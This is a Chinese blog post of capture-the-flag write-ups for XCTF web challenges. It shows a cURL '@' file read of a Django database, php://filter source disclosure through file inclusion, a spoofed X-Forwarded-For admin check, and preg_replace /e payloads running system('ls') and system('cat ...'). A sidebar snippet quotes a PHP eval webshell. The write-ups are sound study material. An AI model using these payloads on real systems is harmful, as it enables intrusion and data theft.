攻防世界 webj进阶

最新推荐文章于 2024-05-16 08:45:57 发布
最新推荐文章于 2024-05-16 08:45:57 发布
阅读量1.6k 收藏 2
点赞数
分类专栏: 网络安全web 文章标签: 攻防世界 web进阶
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yu_csdnstory/article/details/98040258
版权
本文详细介绍了攻防世界中的多个Web挑战,包括利用编码、文件包含、正则表达式漏洞、模板注入、PHP反序列化等技术进行的攻击与防御。通过分析题目给出的源码、错误信息和漏洞利用过程,揭示了Web安全的多个层面,如命令执行、文件读取、SQL注入等。
摘要由CSDN通过智能技术生成

文章目录

cat

原理:


    php cURL CURLOPT_SAFE_UPLOAD
    django DEBUG mode
    Django使用的是gbk编码,超过%F7的编码不在gbk中有意义
    当 CURLOPT_SAFE_UPLOAD 为 true 时,如果在请求前面加上@的话phpcurl组件是会把后面的当作绝对路径请求,来读取文件。当且仅当文件中存在中文字符的时候,Django 才会报错导致获取文件内容。

gbk编码表

CURLOPT_SAFE_UPLOAD在php5.60-php7种有效。

对于这道题目,输入域名没有任何反应,输入127.0.0.1,它会执行ping命令

这次我们执行ping ip 然后尝试命令执行进行注入,但是出现了Invalid URL

ping 127.0.0.1 |'order by 3%23

发现它对%23进行了解码,并对‘和#,|进行了过滤

在URL的传参处?url=这里,我们传递个%79发现传递之后变成了?url=w,看来是可以传递url编码,系统会接受并进行解析,于是我们传递%80会出现报错,url编码使用的是16进制,80也就是128,ASCII码是从0-127
查看报错信息可以判断出后台运行了两个应用,一个是PHP应用,一个是Django,用来处理php发来的请求。:

通过 Django 报错调用栈中的信息,在settings项目中可以看到数据库相关信息

通过访问111.198.29.45:52284/index.php?url=@/opt/api/database.sqlite3 得到数据库内容
搜索{,得到flag
在这里插入图片描述

ics-05

进入题目,除了在设备维修中心有页面之外,其他都是回到主页的index.html
猜测存在文件包含漏洞,用

http://111.198.29.45:55594/index.php?page=0

可以正常回显
尝试获取index源码:

http://111.198.29.45:55594/index.php?page=php://filter/read=convert.base64-encode/resource=index.php

得到base64的源码,解码之后为:

<?php
error_reporting(0);

@session_start();
posix_setuid(1000);


?>
<!DOCTYPE HTML>
<html>

<head>
    <meta charset="utf-8">
    <meta name="renderer" content="webkit">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <link rel="stylesheet" href="layui/css/layui.css" media="all">
    <title>设备维护中心</title>
    <meta charset="utf-8">
</head>

<body>
    <ul class="layui-nav">
        <li class="layui-nav-item layui-this"><a href="?page=index">云平台设备维护中心</a></li>
    </ul>
    <fieldset class="layui-elem-field layui-field-title" style="margin-top: 30px;">
        <legend>设备列表</legend>
    </fieldset>
    <table class="layui-hide" id="test"></table>
    <script type="text/html" id="switchTpl">
        <!-- 这里的 checked 的状态只是演示 -->
        <input type="checkbox" name="sex" value="{
   {d.id}}" lay-skin="switch" lay-text="开|关" lay-filter="checkDemo" {
   {
    d.id==1 0003 ? 'checked' : '' }}>
    </script>
    <script src="layui/layui.js" charset="utf-8"></script>
    <script>
    layui.use('table', function() {
   
        var table = layui.table,
            form = layui.form;

        table.render({
   
            elem: '#test',
            url: '/somrthing.json',
            cellMinWidth: 80,
            cols: [
                [
                    {
    type: 'numbers' },
                     {
    type: 'checkbox' },
                     {
    field: 'id', title: 'ID', width: 100, unresize: true, sort: true },
                     {
    field: 'name', title: '设备名', templet: '#nameTpl' },
                     {
    field: 'area', title: '区域' },
                     {
    field: 'status', title: '维护状态', minWidth: 120, sort: true },
                     {
    field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true }
                ]
            ],
            page: true
        });
    });
    </script>
    <script>
    layui.use('element', function() {
   
        var element = layui.element; //导航的hover效果、二级菜单等功能,需要依赖element模块
        //监听导航点击
        element.on('nav(demo)', function(elem) {
   
            //console.log(elem)
            layer.msg(elem.text());
        });
    });
    </script>

<?php

$page = $_GET[page];

if (isset($page)) {
   



if (ctype_alnum($page)) {
   
?>

    <br /><br /><br /><br />
    <div style="text-align:center">
        <p class="lead"><?php echo $page; die();?></p>
    <br /><br /><br /><br />

<?php

}else{
   

?>
        <br /><br /><br /><br />
        <div style="text-align:center">
            <p class="lead">
                <?php

                if (strpos($page, 'input') > 0) {
   
                    die();
                }

                if (strpos($page, 'ta:text') > 0) {
   
                    die();
                }

                if (strpos($page, 'text') > 0) {
   
                    die();
                }

                if ($page === 'index.php') {
   
                    die('Ok');
                }
                    include($page);
                    die();
                ?>
        </p>
        <br /><br /><br /><br />

<?php
}}


//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
   

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
   
        preg_replace($pattern, $replacement, $subject);
    }else{
   
        die();
    }

}





?>

</body>

</html>

在最后看到了正则匹配,和管理员登陆方式,可以伪造x-F-X

构造正则

pat=/(\w)/e&rep=system('ls')&sub=a


尝试查看文件内容,最终在

?pat=/(\w)/e&rep=system('ls+s3chahahaDir/flag/flag.php')&sub=a


?pat=/(\w)/e&rep=system('cat+s3chahahaDir/flag/flag.php')&sub=a


原理
文件包含读源码、x-forwarded-for
preg_replace 函数执行一个正则表达式的搜索和替换,preg_replce正则表达式部分包含e参数的时候,进行替换的部分会被执行。

所以,估计这个已经在大多数的php网站种不支持了

wtf.sh-150


进入后发现了admin发的回复,说不定可以成为admin

最低0.47元/天 解锁文章
舞动的獾
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界web进阶
weixin_54787877的博客
02-21 277
unserialize3 知识点:反序列化漏洞,wakeup魔法函数 php <?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= ?> 先对代码补全然后进行审计。 class xctf{ //定义一个名为xctf的类 public flag=′111′;//定义一个公有的类属性flag = '111';
基础javawebj
j898209320的博客
12-24 479
javaweb综合。
.什么是JavaScript
jijsn的博客
08-23 446
.什么是JavaScript
CISP-PTE八套真题详解(侵删)_cisp-pte 考题与答案
最新发布
2401_84264536的博客
05-16 670
文件包含的几种方式挨个尝试吧直接包含,失败绝对路径,失败目录穿越,失败远程包含,失败data协议写shell,使用蚁剑连接成功或者使用phpfilter查看源码。
web js的使用方法
qq_34681895的博客
12-03 3861
JavaScript的书写位置; 写在行内: &amp;amp;lt;input type=&amp;quot;button&amp;quot; value=&amp;quot;按钮&amp;quot; onclick=&amp;quot;alert('Hello World')&amp;quot; /&amp;amp;gt; 写在script标签中 &amp;amp;lt;head&amp;amp;
MySQL燕十八老师课程笔记:第十一课:子查询
芋头圆生煎的博客
03-18 179
# 查出本网站最新的(goods_id)最大的一条商品 # 思路:按goods_id desc排序,再取第一行 select goods_id,goods_name from goods order by goods_id desc limit 0,1; # 查出本网站最新的(goods_id)最大的一条商品 # 要求:不允许用排序!! select goods_id,goods_name from goods where goods_id = 33; #(这个做法中的33是用子查询的结果当条件)不具
SQL语句高级查询一、二(刚入门 的也能看懂)
SYJ的博客
01-17 2677
高级查询(一) 一、where条件表达式 SELECT column1, column2… FROM tablename [WHERE condition]; name = “张三” name like “%三” 新建一张表进行测试 1.查找语文成绩大于80分的学生 select * from chengji where chinese > 80; 2.查询数学成绩在60-90之间的学生信息() select * from chengji where math between 60 and 90
Flex和WebJ2EE工程相集合的操作步骤
03-24
Flex和WebJ2EE工程相集合的操作步骤,简单介绍工程的结合方式。
kaleido-webj-quorum-example:使用web3jquorum在Kaleido上的Quorum应用程序示例
05-11
法定人数示例应用 一个简单的示例应用程序,用于检索Quorum客户端节点的版本。 要求 Java 1.8+ 玛文 脚步 在src / main / java / App.java中: 用您的基本身份验证凭据替换用户名... 用您的RPC主机名替换RPC主机名。...
Morphmaster-Web:使用AngularJS和Bootstrap创建单页Web应用程序的特殊框架
03-20
Morphmaster网站 一个简单的入门样板Web应用程序,用于在Windows上使用AngularJS和Bootstrap构建Web应用程序。 Morphmaster还作为电子应用框架存在。查看以获取更多详细信息。 入门 该框架的主要功能是包括一些...
jfinal-web
09-20
【jfinal-web】是一个基于JFinal、Bootstrap和ZKClient技术构建的后台管理系统。这个项目的核心目标是提供一套高效、易用且功能丰富的管理平台,适用于各种企业的内部系统管理需求。接下来,我们将深入探讨这些技术...
Web界面开发框架DevExtreme v21.2 - 文件管理器、UI组件增强
需要界面开发、IDE工具研发中文教程资料的小伙伴,记得私信我~
05-17 476
DevExtreme已正式发布了v21.2,新版本持续增强文件管理器、UI控件功能等,欢迎下载最新版体验!
javaweb开发,提高效率利器——JRebel
no problem的博客
04-17 3759
JRebel idea 热加载插件,提高开发效率,为javaweb开发赋能!
渗透测试CISP-PTE:文件包含
未知2066的博客
03-01 1386
文件包含漏洞(File Inclusion Vulnerability)是一种常见的Web应用程序安全漏洞。它会导致攻击者可以通过控制文件包含的输入来执行任意的代码。文件包含漏洞通常出现在Web应用程序中,当应用程序在处理用户输入时,没有正确地检查和验证用户提供的文件路径或文件名。攻击者可以利用这个漏洞,将恶意文件包含到应用程序的执行流程中,从而执行恶意代码。
CISP-PTE八套真题详解(侵删)
00勇士王子的博客
12-02 6277
PTE八套模拟题详解,侵删
WEB 渗透题(二)
0xac001d09
12-09 1640
[ACTF2020 新生赛]Upload–上传 验证了后缀名,要求上传 jpg、png、gif 结尾的图片,写一句话木马上传,一开始只能是图片的后缀,抓包改后缀为 phtml,文件内容如下 GFI89a <script language="php">eval($_POST['hello']) </script> 上传成功,显示 Upload Success! Look here~ ./uplo4d/fc7cad21c9c68a7847837cf3c194f78d.phtml 直接
新建web project实例
weixin_43751710的博客
03-24 1811
ecplise创建web project 1、创建新web project 在菜单栏选File->New->Other->Web->Dynamic Web Project(如果找不到Web Project的选项,则需要安装J2EE插件,具体见https://blog.csdn.net/weixin_43751710/article/details/88773884) 2、选...
[免费专栏] Android安全之Android Fragment注入
橙留香Park的博客
08-09 964
转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球... ...
java webj建一个简单的客观题模拟系统完整代码包
12-29
Java Web建一个简单的客观题模拟系统完整代码包包括以下部分: 1. 用户界面:使用JSP(JavaServer Pages)实现用户界面,包括登录页面、考试页面和成绩页面。登录页面用于用户登录系统,考试页面用于用户做题,成绩...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值